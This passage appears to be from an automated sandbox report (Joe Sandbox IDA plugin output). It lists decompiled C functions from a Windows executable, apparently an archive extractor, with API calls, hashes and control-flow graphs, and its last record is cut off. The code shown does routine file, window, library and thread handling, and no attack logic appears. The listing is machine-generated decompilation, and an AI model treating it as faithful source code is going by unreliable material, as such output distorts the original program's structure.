                • Instruction ID: 7b64cf2be389dab11805a2819a20ef677f2eb25f92ea29ab8ea9f7c8b08932a1
                • Opcode Fuzzy Hash: 9fc26ebea9741085bd4b30af44f0aede9f44a8efa66ff4810f89bfa97ae5cb06
                • Instruction Fuzzy Hash: 8B51D5B2610A1AAFDB278F64CC41EBBB7AAEF44710F164629FE08DA150DB34DC50D691
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 994 3eabab-3eabca GetClassNameW 995 3eabcc-3eabe1 call 3e1fbb 994->995 996 3eabf2-3eabf4 994->996 1001 3eabe3-3eabef FindWindowExW 995->1001 1002 3eabf1 995->1002 998 3eabff-3eac01 996->998 999 3eabf6-3eabf8 996->999 999->998 1001->1002 1002->996
                C-Code - Quality: 100%
                			E003EABAB(long _a4) {
                				short _v164;
                				long _t5;
                				long _t6;
                				WCHAR* _t9;
                				long _t11;
                
                				_t11 = _a4;
                				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
                				if(_t5 != 0) {
                					_t9 = L"EDIT";
                					_t5 = E003E1FBB( &_v164, _t9);
                					if(_t5 != 0) {
                						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
                						_t11 = _t5;
                					}
                				}
                				if(_t11 != 0) {
                					_t6 = SHAutoComplete(_t11, 0x10); // executed
                					return _t6;
                				}
                				return _t5;
                			}








                APIs
                • GetClassNameW.USER32(?,?,00000050), ref: 003EABC2
                • SHAutoComplete.SHLWAPI(?,00000010), ref: 003EABF9
                  • Part of subcall function 003E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,003DC116,00000000,.exe,?,?,00000800,?,?,?,003E8E3C), ref: 003E1FD1
                • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 003EABE9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AutoClassCompareCompleteFindNameStringWindow
                • String ID: EDIT$pl%w
                • API String ID: 4243998846-2708917214
                • Opcode ID: d7312bfa8862777792f809a7ec846ec3cf853dbb3998ac44831c798b0d50dbda
                • Instruction ID: ef0c29591180c4009a86ebe89af77b86925e52311f0d003cc2b44e09111b9d54
                • Opcode Fuzzy Hash: d7312bfa8862777792f809a7ec846ec3cf853dbb3998ac44831c798b0d50dbda
                • Instruction Fuzzy Hash: 9AF0E23260063976DB215A659C09F9B72BC9B82B01F094121BA00B30C4D760EA4185BA
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1003 3d98e0-3d9901 call 3eec50 1006 3d990c 1003->1006 1007 3d9903-3d9906 1003->1007 1009 3d990e-3d991f 1006->1009 1007->1006 1008 3d9908-3d990a 1007->1008 1008->1009 1010 3d9927-3d9931 1009->1010 1011 3d9921 1009->1011 1012 3d9936-3d9943 call 3d6edb 1010->1012 1013 3d9933 1010->1013 1011->1010 1016 3d994b-3d996a CreateFileW 1012->1016 1017 3d9945 1012->1017 1013->1012 1018 3d996c-3d998e GetLastError call 3dbb03 1016->1018 1019 3d99bb-3d99bf 1016->1019 1017->1016 1024 3d99c8-3d99cd 1018->1024 1027 3d9990-3d99b3 CreateFileW GetLastError 1018->1027 1021 3d99c3-3d99c6 1019->1021 1023 3d99d9-3d99de 1021->1023 1021->1024 1025 3d99ff-3d9a10 1023->1025 1026 3d99e0-3d99e3 1023->1026 1024->1023 1028 3d99cf 1024->1028 1030 3d9a2e-3d9a39 1025->1030 1031 3d9a12-3d9a2a call 3e0602 1025->1031 1026->1025 1029 3d99e5-3d99f9 SetFileTime 1026->1029 1027->1021 1032 3d99b5-3d99b9 1027->1032 1028->1023 1029->1025 1031->1030 1032->1021
                C-Code - Quality: 97%
                			E003D98E0(void* __ecx, void* __esi, signed int _a4, short _a8, WCHAR* _a4180, unsigned int _a4184) {
                				struct _FILETIME _v0;
                				char _t38;
                				void* _t40;
                				long _t52;
                				unsigned int _t53;
                				long _t56;
                				signed int _t57;
                				void* _t61;
                				void* _t62;
                				long _t68;
                				void* _t70;
                
                				_t62 = __esi;
                				E003EEC50(0x1050);
                				_t53 = _a4184;
                				_t61 = __ecx;
                				 *(__ecx + 0x1034) =  *(__ecx + 0x1034) & 0x00000000;
                				if( *((char*)(__ecx + 0x30)) != 0 || (_t53 & 0x00000004) != 0) {
                					_t38 = 1;
                				} else {
                					_t38 = 0;
                				}
                				_push(_t62);
                				_t68 = ( !(_t53 >> 1) & 0x00000001) + 1 << 0x1e;
                				if((_t53 & 0x00000001) != 0) {
                					_t68 = _t68 | 0x40000000;
                				}
                				_t56 =  !(_t53 >> 3) & 0x00000001;
                				if(_t38 != 0) {
                					_t56 = _t56 | 0x00000002;
                				}
                				E003D6EDB( &_a8);
                				if( *((char*)(_t61 + 0x24)) != 0) {
                					_t68 = _t68 | 0x00000100;
                				}
                				_t40 = CreateFileW(_a4180, _t68, _t56, 0, 3, 0x8000000, 0); // executed
                				_t70 = _t40;
                				if(_t70 != 0xffffffff) {
                					goto L15;
                				} else {
                					_v0.dwLowDateTime = GetLastError();
                					if(E003DBB03(_a4180,  &_a8, 0x800) == 0) {
                						L16:
                						if(_v0.dwLowDateTime == 2) {
                							 *((intOrPtr*)(_t61 + 0x1034)) = 1;
                						}
                						L18:
                						if( *((char*)(_t61 + 0x24)) != 0 && _t70 != 0xffffffff) {
                							_v0.dwLowDateTime = _v0.dwLowDateTime | 0xffffffff;
                							_a4 = _a4 | 0xffffffff;
                							SetFileTime(_t70, 0,  &_v0, 0);
                						}
                						 *((char*)(_t61 + 0x1c)) = 0;
                						 *((intOrPtr*)(_t61 + 0x10)) = 0;
                						_t30 = _t70 != 0xffffffff;
                						_t57 = _t56 & 0xffffff00 | _t30;
                						 *((char*)(_t61 + 0x15)) = 0;
                						if(_t30 != 0) {
                							 *(_t61 + 8) = _t70;
                							E003E0602(_t61 + 0x32, _a4180, 0x800);
                							 *((char*)(_t61 + 0x25)) = 0;
                						}
                						return _t57;
                					}
                					_t70 = CreateFileW( &_a8, _t68, _t56, 0, 3, 0x8000000, 0);
                					_t52 = GetLastError();
                					if(_t52 == 2) {
                						_v0.dwLowDateTime = _t52;
                					}
                					L15:
                					if(_t70 != 0xffffffff) {
                						goto L18;
                					}
                					goto L16;
                				}
                			}















                APIs
                • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,003D7760,?,00000005,?,00000011), ref: 003D995F
                • GetLastError.KERNEL32(?,?,003D7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003D996C
                • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,003D7760,?,00000005,?), ref: 003D99A2
                • GetLastError.KERNEL32(?,?,003D7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003D99AA
                • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,003D7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003D99F9
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: File$CreateErrorLast$Time
                • String ID:
                • API String ID: 1999340476-0
                • Opcode ID: 500fbe14f67f44ad972928877108aeb989e8255ae5b2ec441ec3ec0c02f358b1
                • Instruction ID: 516bdbedbb3bceeaff90b7b084f9fa45d49b40845a7e5d193f6a9ac5b98d4d63
                • Opcode Fuzzy Hash: 500fbe14f67f44ad972928877108aeb989e8255ae5b2ec441ec3ec0c02f358b1
                • Instruction Fuzzy Hash: D9315732544341AFE7329F20ED46BDABBD8BB05320F210B1FF9A0962C0D3B4A954CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 1062 3eb568-3eb581 PeekMessageW 1063 3eb5bc-3eb5be 1062->1063 1064 3eb583-3eb597 GetMessageW 1062->1064 1065 3eb5a8-3eb5b6 TranslateMessage DispatchMessageW 1064->1065 1066 3eb599-3eb5a6 IsDialogMessageW 1064->1066 1065->1063 1066->1063 1066->1065
                C-Code - Quality: 100%
                			E003EB568() {
                				struct tagMSG _v32;
                				int _t7;
                				struct HWND__* _t10;
                				long _t14;
                
                				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
                				if(_t7 != 0) {
                					GetMessageW( &_v32, 0, 0, 0);
                					_t10 =  *0x418458; // 0x303f2
                					if(_t10 == 0) {
                						L3:
                						TranslateMessage( &_v32);
                						_t14 = DispatchMessageW( &_v32); // executed
                						return _t14;
                					}
                					_t7 = IsDialogMessageW(_t10,  &_v32); // executed
                					if(_t7 == 0) {
                						goto L3;
                					}
                				}
                				return _t7;
                			}








                APIs
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 003EB579
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003EB58A
                • IsDialogMessageW.USER32(000303F2,?), ref: 003EB59E
                • TranslateMessage.USER32(?), ref: 003EB5AC
                • DispatchMessageW.USER32(?), ref: 003EB5B6
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Message$DialogDispatchPeekTranslate
                • String ID:
                • API String ID: 1266772231-0
                • Opcode ID: 597260089bf95e0ea880c6e79ab3534844680068a226b72aba9d92fd252ac7c7
                • Instruction ID: 021afacfdb143427096a8cb8c62fb8dc1de7f0e11f2276416104c6d7ae41785b
                • Opcode Fuzzy Hash: 597260089bf95e0ea880c6e79ab3534844680068a226b72aba9d92fd252ac7c7
                • Instruction Fuzzy Hash: A4F03071A0116AABCB219FE2DC4CDDBBFBCEE053927004424B905D2094EB34E605CBB4
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 25%
                			E003EAC16(intOrPtr* __ecx) {
                				char _v8;
                				intOrPtr _v12;
                				char _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				char _v32;
                				intOrPtr _t10;
                
                				_t10 = E003E081B(L"riched20.dll"); // executed
                				 *__ecx = _t10;
                				 *0x433174(0); // executed
                				_v16 = 8;
                				_v12 = 0x7ff;
                				 *0x433034( &_v16); // executed
                				_v32 = 1;
                				_v28 = 0;
                				_v24 = 0;
                				_v20 = 0;
                				L003EEB2C(); // executed
                				 *0x433090(0x418438,  &_v8,  &_v32, 0); // executed
                				return __ecx;
                			}












                APIs
                  • Part of subcall function 003E081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003E0836
                  • Part of subcall function 003E081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,003DF2D8,Crypt32.dll,00000000,003DF35C,?,?,003DF33E,?,?,?), ref: 003E0858
                • OleInitialize.OLE32(00000000), ref: 003EAC2F
                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 003EAC66
                • SHGetMalloc.SHELL32(00418438), ref: 003EAC70
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                • String ID: riched20.dll
                • API String ID: 3498096277-3360196438
                • Opcode ID: 1fcc78dcf0a6cf5f1a3f9c245e0490a46cd4acb96e2a878b277599fa7d829b63
                • Instruction ID: e875ef501408aef6ee5c0f16a0cad6f8cbf6abe84f5393b91e307deddb987787
                • Opcode Fuzzy Hash: 1fcc78dcf0a6cf5f1a3f9c245e0490a46cd4acb96e2a878b277599fa7d829b63
                • Instruction Fuzzy Hash: 28F062B1D00219ABCB10AFA9D9499DFFFFCEF84701F00412AE441E2241DBB856458FA0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 1071 3d9785-3d9791 1072 3d979e-3d97b5 ReadFile 1071->1072 1073 3d9793-3d979b GetStdHandle 1071->1073 1074 3d97b7-3d97c0 call 3d98bc 1072->1074 1075 3d9811 1072->1075 1073->1072 1079 3d97d9-3d97dd 1074->1079 1080 3d97c2-3d97ca 1074->1080 1077 3d9814-3d9817 1075->1077 1082 3d97df-3d97e8 GetLastError 1079->1082 1083 3d97ee-3d97f2 1079->1083 1080->1079 1081 3d97cc 1080->1081 1086 3d97cd-3d97d7 call 3d9785 1081->1086 1082->1083 1087 3d97ea-3d97ec 1082->1087 1084 3d980c-3d980f 1083->1084 1085 3d97f4-3d97fc 1083->1085 1084->1077 1085->1084 1088 3d97fe-3d9807 GetLastError 1085->1088 1086->1077 1087->1077 1088->1084 1090 3d9809-3d980a 1088->1090 1090->1086
                C-Code - Quality: 59%
                			E003D9785(void* __ecx, void* _a4, long _a8) {
                				long _v8;
                				int _t14;
                				signed int _t15;
                				void* _t25;
                
                				_push(__ecx);
                				_t25 = __ecx;
                				if( *((intOrPtr*)(__ecx + 0x10)) == 1) {
                					 *(_t25 + 8) = GetStdHandle(0xfffffff6);
                				}
                				_t14 = ReadFile( *(_t25 + 8), _a4, _a8,  &_v8, 0); // executed
                				if(_t14 != 0) {
                					_t15 = _v8;
                				} else {
                					_t16 = E003D98BC(_t25);
                					if(_t16 == 0) {
                						L7:
                						if( *((intOrPtr*)(_t25 + 0x10)) != 1) {
                							L10:
                							if( *((intOrPtr*)(_t25 + 0x10)) != 0 || _a8 <= 0x8000) {
                								L14:
                								_t15 = _t16 | 0xffffffff;
                							} else {
                								_t16 = GetLastError();
                								if(_t16 != 0x21) {
                									goto L14;
                								} else {
                									_push(0x8000);
                									goto L6;
                								}
                							}
                						} else {
                							_t16 = GetLastError();
                							if(_t16 != 0x6d) {
                								goto L10;
                							} else {
                								_t15 = 0;
                							}
                						}
                					} else {
                						_t16 = 0x4e20;
                						if(_a8 <= 0x4e20) {
                							goto L7;
                						} else {
                							_push(0x4e20);
                							L6:
                							_push(_a4);
                							_t15 = E003D9785(_t25);
                						}
                					}
                				}
                				return _t15;
                			}








                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 003D9795
                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 003D97AD
                • GetLastError.KERNEL32 ref: 003D97DF
                • GetLastError.KERNEL32 ref: 003D97FE
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ErrorLast$FileHandleRead
                • String ID:
                • API String ID: 2244327787-0
                • Opcode ID: 9fa0c2eeb7d917da346a24c3d7cdf2d31740f882df1be0746fae87287d7d781c
                • Instruction ID: 21abe6ab06700ad0596fb5c6aced076f66c38cdd9faef5cca3d007cb93246c2d
                • Opcode Fuzzy Hash: 9fa0c2eeb7d917da346a24c3d7cdf2d31740f882df1be0746fae87287d7d781c
                • Instruction Fuzzy Hash: 7C110832910204EBCF225F64EC047693BACFB02721F11852BF816D5790D770CE44EB61
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 1092 3fad34-3fad48 1093 3fad4a-3fad53 1092->1093 1094 3fad55-3fad70 LoadLibraryExW 1092->1094 1095 3fadac-3fadae 1093->1095 1096 3fad99-3fad9f 1094->1096 1097 3fad72-3fad7b GetLastError 1094->1097 1100 3fada8 1096->1100 1101 3fada1-3fada2 FreeLibrary 1096->1101 1098 3fad7d-3fad88 LoadLibraryExW 1097->1098 1099 3fad8a 1097->1099 1102 3fad8c-3fad8e 1098->1102 1099->1102 1103 3fadaa-3fadab 1100->1103 1101->1100 1102->1096 1104 3fad90-3fad97 1102->1104 1103->1095 1104->1103
                C-Code - Quality: 95%
                			E003FAD34(signed int _a4) {
                				signed int _t9;
                				void* _t10;
                				void* _t13;
                				signed int _t15;
                				WCHAR* _t22;
                				signed int _t24;
                				signed int* _t25;
                				void* _t27;
                
                				_t9 = _a4;
                				_t25 = 0x4325d8 + _t9 * 4;
                				_t24 =  *_t25;
                				if(_t24 == 0) {
                					_t22 =  *(0x4073f0 + _t9 * 4);
                					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
                					_t27 = _t10;
                					if(_t27 != 0) {
                						L8:
                						 *_t25 = _t27;
                						if( *_t25 != 0) {
                							FreeLibrary(_t27);
                						}
                						_t13 = _t27;
                						L11:
                						return _t13;
                					}
                					_t15 = GetLastError();
                					if(_t15 != 0x57) {
                						_t27 = 0;
                					} else {
                						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                						_t27 = _t15;
                					}
                					if(_t27 != 0) {
                						goto L8;
                					} else {
                						 *_t25 = _t15 | 0xffffffff;
                						_t13 = 0;
                						goto L11;
                					}
                				}
                				_t4 = _t24 + 1; // 0xc24f6282
                				asm("sbb eax, eax");
                				return  ~_t4 & _t24;
                			}












                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,003F40EF,00000000,00000000,?,003FACDB,003F40EF,00000000,00000000,00000000,?,003FAED8,00000006,FlsSetValue), ref: 003FAD66
                • GetLastError.KERNEL32(?,003FACDB,003F40EF,00000000,00000000,00000000,?,003FAED8,00000006,FlsSetValue,00407970,FlsSetValue,00000000,00000364,?,003F98B7), ref: 003FAD72
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,003FACDB,003F40EF,00000000,00000000,00000000,?,003FAED8,00000006,FlsSetValue,00407970,FlsSetValue,00000000), ref: 003FAD80
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: f490fc4a30220672585ed451767880516977fec5ae306e4119bfcb0435b13ac0
                • Instruction ID: 16e807b949a502177e2071c7e89616f5c357d80bed10d22da5054c6cf4060030
                • Opcode Fuzzy Hash: f490fc4a30220672585ed451767880516977fec5ae306e4119bfcb0435b13ac0
                • Instruction Fuzzy Hash: FD014776211A2AABC7234F689C54A677F5CEF047A37120230FE0AE3561C730D801C6E5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E003FBA27(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8) {
                				char _v8;
                				char _v16;
                				void* __ebp;
                				char _t31;
                				signed int _t36;
                				char _t40;
                				intOrPtr _t44;
                				char _t45;
                				signed int _t51;
                				void* _t64;
                				void* _t70;
                				signed int _t75;
                				void* _t81;
                
                				_t81 = __eflags;
                				_t68 = __edx;
                				_v8 = E003F97E5(__ebx, __ecx, __edx);
                				E003FBB4E(__ebx, __ecx, __edx, __edi, __esi, _t81);
                				_t31 = E003FB7BB(_t81, _a4);
                				_v16 = _t31;
                				_t57 =  *(_v8 + 0x48);
                				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
                					return 0;
                				}
                				_push(__ebx);
                				_push(__esi);
                				_push(__edi);
                				_t70 = E003F8E06(_t57, 0x220);
                				_t51 = __ebx | 0xffffffff;
                				__eflags = _t70;
                				if(__eflags == 0) {
                					L5:
                					_t75 = _t51;
                					goto L6;
                				} else {
                					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
                					 *_t70 =  *_t70 & 0x00000000; // executed
                					_t36 = E003FBBF0(_t68, _t70, __eflags, _v16, _t70); // executed
                					_t75 = _t36;
                					__eflags = _t75 - _t51;
                					if(_t75 != _t51) {
                						__eflags = _a8;
                						if(_a8 == 0) {
                							E003F8B6F();
                						}
                						asm("lock xadd [eax], ebx");
                						__eflags = _t51 == 1;
                						if(_t51 == 1) {
                							_t45 = _v8;
                							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0x40ec70;
                							if( *((intOrPtr*)(_t45 + 0x48)) != 0x40ec70) {
                								E003F8DCC( *((intOrPtr*)(_t45 + 0x48)));
                							}
                						}
                						 *_t70 = 1;
                						_t64 = _t70;
                						_t70 = 0;
                						 *(_v8 + 0x48) = _t64;
                						_t40 = _v8;
                						__eflags =  *(_t40 + 0x350) & 0x00000002;
                						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
                							__eflags =  *0x40eef0 & 0x00000001;
                							if(( *0x40eef0 & 0x00000001) == 0) {
                								_v16 =  &_v8;
                								E003FB691(5,  &_v16);
                								__eflags = _a8;
                								if(_a8 != 0) {
                									_t44 =  *0x40ee90; // 0x2b62370
                									 *0x40e964 = _t44;
                								}
                							}
                						}
                						L6:
                						E003F8DCC(_t70);
                						return _t75;
                					} else {
                						 *((intOrPtr*)(E003F91A8())) = 0x16;
                						goto L5;
                					}
                				}
                			}

















                APIs
                  • Part of subcall function 003F97E5: GetLastError.KERNEL32(?,00411098,003F4674,00411098,?,?,003F40EF,?,?,00411098), ref: 003F97E9
                  • Part of subcall function 003F97E5: _free.LIBCMT ref: 003F981C
                  • Part of subcall function 003F97E5: SetLastError.KERNEL32(00000000,?,00411098), ref: 003F985D
                  • Part of subcall function 003F97E5: _abort.LIBCMT ref: 003F9863
                  • Part of subcall function 003FBB4E: _abort.LIBCMT ref: 003FBB80
                  • Part of subcall function 003FBB4E: _free.LIBCMT ref: 003FBBB4
                  • Part of subcall function 003FB7BB: GetOEMCP.KERNEL32(00000000,?,?,003FBA44,?), ref: 003FB7E6
                • _free.LIBCMT ref: 003FBA9F
                • _free.LIBCMT ref: 003FBAD5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _free$ErrorLast_abort
                • String ID: p@
                • API String ID: 2991157371-1482256116
                • Opcode ID: 67ce10eac41ac30c250a6b0183a255ce6eaa5c758d15a499daa0ddbc274821a6
                • Instruction ID: 6c54660a814e34b310d6bd3d15d4f929acf9f48b53a608e8bcc5a052dad6abb0
                • Opcode Fuzzy Hash: 67ce10eac41ac30c250a6b0183a255ce6eaa5c758d15a499daa0ddbc274821a6
                • Instruction Fuzzy Hash: AD31937190420DAFDF16EFA9D441BB9F7F5EF41320F254099E6049B2A2EB329D40DB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 67%
                			E003E101F() {
                				long _v4;
                				void* __ecx;
                				void* __esi;
                				void* __ebp;
                				void* _t5;
                				void* _t7;
                				int _t8;
                				void* _t12;
                				void** _t18;
                				void* _t22;
                
                				_t12 = 0;
                				if( *0x411098 > 0) {
                					_t18 = 0x41109c;
                					do {
                						_t7 = CreateThread(0, 0x10000, E003E1160, 0x411098, 0,  &_v4); // executed
                						_t22 = _t7;
                						_t25 = _t22;
                						if(_t22 == 0) {
                							_push(L"CreateThread failed");
                							_push(0x411098);
                							E003D6C36(0x411098);
                							E003D6C31(E003D6DCB(0x411098, _t25), 0x411098, 0x411098, 2);
                						}
                						 *_t18 = _t22;
                						 *0x0041119C =  *((intOrPtr*)(0x41119c)) + 1;
                						_t8 =  *0x4181e0; // 0x0
                						if(_t8 != 0) {
                							_t8 = SetThreadPriority( *_t18, _t8);
                						}
                						_t12 = _t12 + 1;
                						_t18 =  &(_t18[1]);
                					} while (_t12 <  *0x411098);
                					return _t8;
                				}
                				return _t5;
                			}














                APIs
                • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 003E1043
                • SetThreadPriority.KERNEL32(?,00000000), ref: 003E108A
                  • Part of subcall function 003D6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D6C54
                  • Part of subcall function 003D6DCB: _wcschr.LIBVCRUNTIME ref: 003D6E0A
                  • Part of subcall function 003D6DCB: _wcschr.LIBVCRUNTIME ref: 003D6E19
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                • String ID: CreateThread failed
                • API String ID: 2706921342-3849766595
                • Opcode ID: b1bde1085845b8b5437c4c9e13d87ae2c3ad292bcaacbbca399194f0f4bcabf1
                • Instruction ID: daa00c995c72a1d86f507b2f3f940fcb65f4ffcd53d2c9a82fbe1708709a4674
